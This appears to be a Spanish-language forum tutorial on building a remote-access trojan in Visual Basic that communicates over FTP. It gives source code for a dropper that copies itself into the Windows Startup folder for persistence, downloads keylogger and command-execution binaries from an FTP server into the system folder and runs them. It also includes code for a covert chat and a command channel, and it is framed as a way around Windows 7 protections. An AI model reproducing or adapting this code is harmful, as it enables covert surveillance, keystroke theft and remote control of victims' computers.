Pués bien, compienzo:
Antes de empezar voy a dejar claro las funciones que quiero que tenga:
-Keylogger
-Chat
-Chat "a lo Matrix"
-Abrir consola
-Ejecutar
abrimos el Visual Basic (en mi caso el 2008, que también funciona en windows 7) y agregamos un nuevo proyecto. Este será el "Panel de control" del cliente:
Ponemos unos buttons (yo los he puesto incluidos en un ToolStrip, pero da igual).
Aquí viene una de las cosas que debes de tener en cuenta para que tu troyano FTP no se te bloquee; esos botones, no habren un Form2, ni otro formulario, si no que habrén programas que se encargan de esa función (la del keylogger por ejemplo).
Esto lo hacemos por que si pones todas las conexiones del troyano (keylogger, ordenes, chats...) pues el programa se te acaba saturando y bloqueando; por ello, lo ponemos por separado. Aunque lo metamos por separado, no hace falta que el ejecute todos los apartados>>>>en vez de eso, ejecutará un solo programa, el cual se descargará las otras partes de un servidor y las pondrá en las carpetas del equipo correspondientes. El código sería así:
Código:
Public Class Form1
Dim aPath As String = Application.ExecutablePath()
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
If Not My.Computer.FileSystem.FileExists("C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio\msp.exe") Then
My.Computer.FileSystem.CopyFile(aPath, "C:\Documents and Settings\Administrador\Menú Inicio\Programas\Inicio\msp.exe")
End If
If My.Computer.FileSystem.FileExists("C:\WINDOWS\keg.exe") And My.Computer.FileSystem.FileExists("C:\WINDOWS\ord.exe") Then
Shell("C:\WINDOWS\keg.exe")
Shell("C:\WINDOWS\ord.exe")
End If
If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\keg.exe") Then
My.Computer.Network.DownloadFile("ftp://servidor/key.exe", "C:\WINDOWS\keg.exe", "user", "passw")
End If
If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\cht.exe") Then
My.Computer.Network.DownloadFile("ftp://servidor/chat.exe", "C:\WINDOWS\cht.exe", "user", "passw")
End If
If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\chmat.exe") Then
My.Computer.Network.DownloadFile("ftp://servidor/chatmatrix.exe", "C:\WINDOWS\chmat.exe", "user", "passw")
End If
If Not My.Computer.FileSystem.FileExists("C:\WINDOWS\ord.exe") Then
My.Computer.Network.DownloadFile("ftp://servidor/ordenes.exe", "C:\WINDOWS\ord.exe", "user", "passw")
Shell("C:\WINDOWS\keg.exe")
Shell("C:\WINDOWS\ord.exe")
End If
End
End Sub
End Class
Ese sería el código del "Instalador" del Server.
Tampoco pretendo poner todo el código fuente de mi troyano así que diré lo imprescindible:
--La transmisión de datos de los chat se hace por el siguiente código:
Código:
Dim name As String
name = TextBox1.Text
Try
Dim client As New Net.WebClient
client.Credentials = New Net.NetworkCredential("user", "passw")
client.UploadString("fttp://sevidor/cht1.txt", name & ": " & vbNewLine & RichTextBox1.Text & vbNewLine)
RichTextBox1.Clear()
Catch ex As Exception
End Try
Try
Dim client As New Net.WebClient
client.Credentials = New Net.NetworkCredential("user", "passw")
RichTextBox2.Text = client.DownloadString("ftp://servidor/cht1.txt")
Catch ex As Exception
End Try
Doy por echo que sabeis hacer un keylogger así que no lo pongo.
Y como no queremos que se acumulen las ordenes cuando las mandemos, al recibirlas el servidor sube un archivo que sustituye el otro, dejandolo en blanco, lo cual se haría con este código: (este código se pondría después de que se ejecutase el correspodiente archivo)
Servidor (el apartado de las ordenes):
Código:
My.Computer.FileSystem.WriteAllText(aPath & "\remord1.txt", _
"", True)
My.Computer.Network.UploadFile(aPath & "\remord1.txt", "ftp://servidor/orderlist1.txt", "user", "passw")
My.Computer.FileSystem.DeleteFile(aPath & "\remord1.txt")
RichTextBox1.Clear()
Os pongo una foto de como queda:
-La pantalla del Servidor cuando le pones el chat "a lo Matrix" (toda la pantalla):
-Y como sería el controlador del chat "a lo matrix" (el cliente):
Bueno espero que os sirva para adaptaros a las nuevas politicas anti-winsock que se manifistan en windows 7